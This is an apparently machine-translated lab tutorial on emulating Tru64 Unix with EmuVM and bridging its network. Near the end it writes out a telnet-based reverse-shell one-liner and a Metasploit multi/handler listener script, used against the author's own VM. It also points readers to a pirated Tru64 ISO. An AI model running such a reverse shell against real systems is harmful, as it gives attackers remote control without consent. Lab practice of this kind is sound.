Remote System Identification: Guide to Tru64 Unix system construction and penetration

Remote System Identification: Guide to Tru64 Unix system construction and penetration

With the continuous development of virtualization technology, it has brought us more and more convenience, so that we can simulate almost any device we can think. Here we use this superb virtualization technology to figure out a Tru64 Ubix operating system, which is not so common, and use Metasploit to perform a simple penetration demonstration.

Tool Environment

Here we use the simulator named EmuVM, this is a free virtualization software, and support Windows platform and linux platform at the same time, the need of students can be downloaded here: http://emuvm.com/downloads.php

This simulator can simulate a large number of Alpha servers, and can be said to be the best choice for 64-bit linux systems. I decided to write an article to record the process of building Tru64 Unix systems, at the same time, I will use Metasploit for simple penetration of the established system environment.

First, we need to obtain an EmuVM Installation File. Here I am using a stable version of the software alphavm-free-1-3-9.tgz (http://emuvm.com/read.php? File = alphavm-free-1-3-9.tgz ). The downloaded and decompressed folder contains two important files: one is the binary file started by the simulator, and the other is the configuration file. I have attached my configuration file, which is used when I simulate AlphaServer DS10 616 MhZ.

 

Here is the content of config. emu:

system{type = ds10_616;reported_type = default;num_cpus = 1;ssn = 'EmuVM-00-000-001';interval_clock_freq = 1000;memory{size= 512;}cpu{server = basic;jit{async = yes;}}serial com1 {server = socket;port = 3000;}serial com2 {server = socket;port = 3001;}scsi_controllerqla0 {scsi_id= 7;}scsi_controller qla1 {scsi_id = 7;}scsi_disk dka0 {scsi_bus = 0;scsi_id = 0;scsi_lun = 0;file = 'disk.dd';caching = no;write_through = yes;}scsi_cdrom iso {scsi_id = 4;file = 'Tru64.iso';}ether eth0 {type = dec21040;server = dummy;mac_address = 0x08002B000001;}ether eth1 {type = dec21040;server = tap;interface = 'tap0';mac_address = 0x08002B000002;}}

 

The important part of the configuration file is the location of the virtual disk and the settings of the network card. Here I put all the files under the root. In addition, we also need to prepare a space of about 2 GB before installation to place our simulation system.

dd if=/dev/zero of=disk.dd bs=1024 count=2M

Virtual System Preparation

Okay. After this step, we need to install the Tru64 system. If you have an installation CD, you can simply convert the CD content into an ISO file. If you do not have one, you can find one on the Pirate Bay, https://thepiratebay.cr/torrent/5634366/Tru64_5.1B4)

Now you can start the VM with the ISO image. The command is as follows:

./alphavm_free config.emu

Then we can use socat to connect to the virtual machine. The command is as follows:

socat -,raw,echo=0,escape=0x1c tcp:127.0.0.1:3000

 

Of course, we can also use other methods, such as telnet or putty, to connect to the virtual machine, but there may be some problems, so I suggest using socat connection here.

user@Obelix:~/KVM/Alpha/Tru64$./connect.console.sh

System installation Configuration

Okay, here we need our ISO image file to install Tru64. First we need to tell the virtual machine from which device to boot. Here we need dka400 (CDROM ):

boot dka400

ISO is a single-user startup mode, and then we can perform simple system installation. It is not very difficult to follow the instructions step by step, I believe everyone has experience in installing virtual machines.

After the installation is complete, you can directly start the HDD:

boot dka0

The most important thing is to configure the network environment. Here I will show you how to configure the virtual network card tap0 and the bridge network port through a simple script. I am using a notebook with two NICs. One is a wireless Nic, the interface is wlan0, the other is a wired Nic, and the interface is eth0. Among them, eth0 is connected to the VM host, while the wireless network card wlan0 is connected to the network. The following is my configuration script:

tunctl -t tap0 -u userifconfig tap0 upbrctl addbr br0brctl addif br0 eth0brctl setfd br0 0ifconfig eth0 10.0.2.1 upifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 uproute add -net 0.0.0.0/0 gw 10.0.2.1brctl addif br0 tap0ifconfig tap0 0.0.0.0iptables -A POSTROUTING -j MASQUERADE -s 10.0.2.0/24 -t nat

Before running this Vm, I add a virtual Nic to the VM and add the following content to the config. emu file:

ether eth1 {type = dec21040;server = tap;interface = 'tap0';mac_address = 0x08002B000002;}

In the virtual machine, we need to specify the IP address, with the following Configuration:

tu1: flags=c63<UP,BROADCAST,NOTRAILERS,RUNNING,MULTICAST,SIMPLEX>inet 10.0.2.10 netmask ffffff00 broadcast 10.0.2.255 ipmtu 1500

Simple penetration testing

 

Now we have set up the virtual machine. Next we will perform a simple penetration test on this virtual machine. Here we will still use a reverse
Shell to create a backdoor file for the Virtual Machine to execute, the generated c file is as follows:

 

sh-c '(sleep 4074|telnet 10.0.2.1 8000|while : ; do sh &&break; done 2>&1|telnet 10.0.2.1 8000 >/dev/null 2>&1&)'

Then we create a listener on the HOST:

#!/bin/bashclearecho "***************************************************************"echo " Automatic shellcode generator - FOR METASPLOIT "echo "***************************************************************"echo -e "What Port Number are we gonna listen to? : \c"read portecho " starting the meterpreter listener.."./msfcli exploit/multi/handler PAYLOAD=cmd/unix/reverse LHOST=10.0.2.1 LPORT=$port E

Then we can see that our Metasploit receives a reverse
Shell.

 

The main purpose of this article is to play a guiding role in teaching, mainly to tell everyone how to build a system that is not particularly commonly used. Here, the author uses the HP Tru64Unix system, I hope you will have some gains.